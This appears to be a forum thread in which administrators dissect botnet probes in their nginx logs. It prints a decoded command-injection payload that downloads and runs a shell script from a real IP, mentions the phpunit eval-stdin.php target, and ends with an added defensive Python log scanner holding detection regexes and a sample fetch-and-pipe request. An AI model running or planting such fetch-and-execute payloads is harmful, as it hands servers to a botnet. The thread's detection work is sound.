Decodes to:
cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}
I have to admire the use of POSIX-compliant shell.
Payload is here if anyone is curious: https://pastes.io/wcrrondosh
Obviously don't run it, but I love that if you get down far enough it will try to execute a Motorola 68k binary.
4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
That's not how you spell xmlrpc, and that's not where WordPress puts that.
I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol
Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.
Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"
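A defender-side triage of the request patterns mentioned in this thread, as an added example that is not part of the original posts: it URL-decodes each nginx request target and tags the `${system(...)}` injection, the fetch-and-pipe-to-shell body, `eval-stdin.php` and the misspelled `xmrlpc.php`. The log lines, IP addresses, host name, request paths and rule names are constructed for illustration, and the first rule generalizes slightly to other PHP command-execution functions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in nginx "combined" format. IPs are documentation
# addresses and payload.example is a placeholder, not values from the thread.
SAMPLE_LOG = r'''
203.0.113.7 - - [12/Nov/2025:23:27:50 +0000] "GET /index.php?cat_id=%24%7Bsystem(wget%20-qO-%20http%3A%2F%2Fpayload.example%2Fx.sh%7Csh)%7D HTTP/1.1" 200 512 "-" "-"
203.0.113.8 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
203.0.113.9 - - [12/Nov/2025:23:28:01 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "-"
198.51.100.4 - - [12/Nov/2025:23:28:09 +0000] "GET /blog/?page=2 HTTP/1.1" 200 8301 "-" "Mozilla/5.0"
'''.strip().splitlines()

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Hypothetical rule names; patterns are applied to the *decoded* target.
RULES = [
    ("template-exec", re.compile(r"\$\{\s*(system|exec|passthru|shell_exec)\s*\(", re.I)),
    ("fetch-pipe-shell", re.compile(r"\b(wget|curl)\b[^|]*\|\s*(ba)?sh\b", re.I)),
    ("phpunit-eval-stdin", re.compile(r"/eval-stdin\.php\b", re.I)),
    ("bogus-xmlrpc", re.compile(r"/xmrlpc\.php\b", re.I)),
]

def decode(target, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are also normalised."""
    for _ in range(rounds):
        nxt = unquote_plus(target)
        if nxt == target:
            break
        target = nxt
    return target

def scan(lines):
    """Return (ip, status, [rule names]) for every line that matches a rule."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        ip, _method, target, status = m.groups()
        tags = [name for name, rx in RULES if rx.search(decode(target))]
        if tags:
            hits.append((ip, int(status), tags))
    return hits

if __name__ == "__main__":
    for ip, status, tags in scan(SAMPLE_LOG):
        print(f"{ip} status={status} {','.join(tags)}")
```

A hit with a status other than 404 (the first constructed line returns 200) is the one to look at first, since the target script exists and may have processed the parameter.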